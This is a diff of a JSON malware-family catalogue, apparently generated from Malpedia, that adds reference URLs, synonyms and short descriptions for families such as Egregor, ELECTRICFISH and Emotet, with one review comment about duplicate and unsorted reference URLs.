"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.secureworks.com/research/threat-profiles/nickel-academy" + ], + "synonyms": [ + "Escad" ], - "synonyms": [], "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", "value": "Duuzer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack", + "https://content.fireeye.com/apt/rpt-apt38", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://github.com/649/APT38-DYEPACK" + ], + "synonyms": [ + "swift" + ], + "type": [] + }, + "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", + "value": "DYEPACK" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html", + "https://www.secureworks.com/research/threat-profiles/gold-blackburn", 
"https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ @@ -7449,11 +14320,26 @@ "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", "value": "Dyre" }, + { + "description": "FireEye describes EASYNIGHT is a loader observed used with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.\r\n\r\nExamples include a patched bcrypt.dll with no other modification than an additional import entry, in the observed case \"printwin.dll!gzwrite64\" (breaking the file signature).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight", + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0277b1e5-ea2d-4dec-bbaa-13e25a2d1f1c", + "value": "EASYNIGHT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], 
@@ -7462,6 +14348,58 @@
 "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254",
 "value": "EDA2"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/",
+ "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
+ "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/",
+ "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf",
+ "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia",
+ "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/",
+ "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html",
+ "https://www.group-ib.com/blog/egregor",
+ "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
+ "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/",
+ "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/",
+ "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor",
+ "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf",
+ "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html",
+ "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
+ "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cd84bc53-8684-4921-89c7-2cf49512bf61",
+ "value": "Egregor"
+ },
 {
 "description": "",
 "meta": {
@@ -7475,12 +14413,26 @@
 "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
 "value": "EHDevel"
 },
+ {
+ "description": "The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.us-cert.gov/ncas/analysis-reports/AR19-129A",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0f5a2ce1-b44f-4088-a4c0-04456a90c174",
+ "value": "ELECTRICFISH"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf",
 "https://www.clearskysec.com/iec/"
 ],
 "synonyms": [],
@@ -7507,12 +14459,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise",
- "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
+ "https://www.joesecurity.org/blog/8409877569366580427",
+ "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html",
 "https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
- "https://www.joesecurity.org/blog/8409877569366580427"
+ "https://www.secureworks.com/research/threat-profiles/bronze-elgin",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
+ "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
+ "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
+ "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf"
+ ],
+ "synonyms": [
+ "EVILNEST"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01",
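Review bot: The Elise refs now carry two spellings of the same Accenture Dragonfish PDF, `.../t20180127T003755Z_w_/...` and `.../t20180127T003755Z__w__/...`, so consumers that key on exact URL will show a duplicate reference (one spelling may be a transcription artifact, but both are emitted). The Emotet hunk later in this commit has the same pattern with `https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/...?source=mmpc` and `https://www.microsoft.com/security/blog/2017/11/06/...`, the same post under an old and a new hostname. Because the file is regenerated from the Malpedia API, deduplicating by normalised URL in the export step or fixing the upstream entries is the durable fix; a hand edit here would be lost on the next update. This hunk also removes and re-adds the unchanged accenture, paloaltonetworks and joesecurity URLs at different positions, which shows the refs arrays are emitted in no stable order; sorting them in the generator would keep future diffs reviewable instead of rewriting whole blocks of unchanged references.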
@@ -7524,8 +14483,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer",
 "https://www.symantec.com/security-center/writeup/2015-122210-5724-99",
- "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
- "https://attack.mitre.org/software/S0064"
+ "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/",
+ "https://attack.mitre.org/software/S0064",
+ "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html"
 ],
 "synonyms": [
 "Elmost"
@@ -7543,6 +14503,8 @@
 "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
 "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html",
 "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
+ "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/",
+ "https://www.macnica.net/file/security_report_20160613.pdf",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/"
 ],
 "synonyms": [],
@@ -7553,42 +14515,180 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emissary",
+ "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a171f40a-85eb-4b64-af1d-8860a49b3b40",
+ "value": "Emissary"
+ },
+ {
+ "description": "While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.\r\nIt is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
- "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
- "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
- "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
- "https://github.com/d00rt/emotet_research",
- "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.youtube.com/watch?v=q8of74upT_g",
+ "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/",
+ "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure",
+ "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet",
+ "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.jpcert.or.jp/english/at/2019/at190044.html",
+ "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/",
+ "https://twitter.com/raashidbhatt/status/1237853549200936960",
 "https://www.us-cert.gov/ncas/alerts/TA18-201A",
- "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
+ "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf",
+ "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
 "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
- "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
- "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/",
- "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
- "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
- "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
- "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
- "https://persianov.net/emotet-malware-analysis-part-1",
- "https://persianov.net/emotet-malware-analysis-part-2",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-crestwood",
+ "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://www.youtube.com/watch?v=5_-oR_135ss",
+ "https://www.digitalshadows.com/blog-and-research/emotet-disruption/",
+ "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/",
+ "https://www.youtube.com/watch?v=_BLOmClsSpc",
 "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
 "https://paste.cryptolaemus.com",
- "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
- "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
- "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader",
- "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
- "https://feodotracker.abuse.ch/?filter=version_e",
+ "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html",
+ "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
 "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
 "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/",
- "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69"
+ "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/",
+ "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69",
+ "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
+ "https://blog.talosintelligence.com/2020/11/emotet-2020.html",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.hornetsecurity.com/en/security-information/emotet-is-back/",
+ "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures",
+ "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728",
+ "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/",
+ "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b",
+ "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
+ "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/",
+ "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html",
+ "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/",
+ "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
+ "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
+ "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation",
+ "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
+ "https://www.youtube.com/watch?v=8PHCZdpNKrw",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
+ "https://github.com/mauronz/binja-emotet",
+ "https://www.cert.pl/en/news/single/whats-up-emotet/",
+ "https://persianov.net/emotet-malware-analysis-part-1",
+ "https://persianov.net/emotet-malware-analysis-part-2",
+ "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action",
+ "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
+ "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/",
+ "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/",
+ "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
+ "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/",
+ "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
+ "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack",
+ "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware",
+ "https://hatching.io/blog/powershell-analysis",
+ "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf",
+ "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/",
+ "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/",
+ "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
+ "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html",
+ "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
+ "https://www.youtube.com/watch?v=_mGMJFNJWSk",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/",
+ "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/",
+ "http://ropgadget.com/posts/defensive_pcres.html",
+ "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
+ "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html",
+ "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://intel471.com/blog/emotet-takedown-2021/",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://feodotracker.abuse.ch/?filter=version_e",
+ "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
+ "https://unit42.paloaltonetworks.com/domain-parking/",
+ "https://spamauditor.org/2020/10/the-many-faces-of-emotet/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/",
+ "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
+ "https://securelist.com/the-chronicles-of-emotet/99660/",
+ "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/",
+ "https://twitter.com/milkr3am/status/1354459859912192002",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://github.com/d00rt/emotet_research",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
+ "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates",
+ "https://isc.sans.edu/diary/rss/27036",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://d00rt.github.io/emotet_network_protocol/",
+ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/",
+ "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/",
+ "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html",
+ "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612",
+ "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/",
+ "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
+ "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/",
+ "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de"
 ],
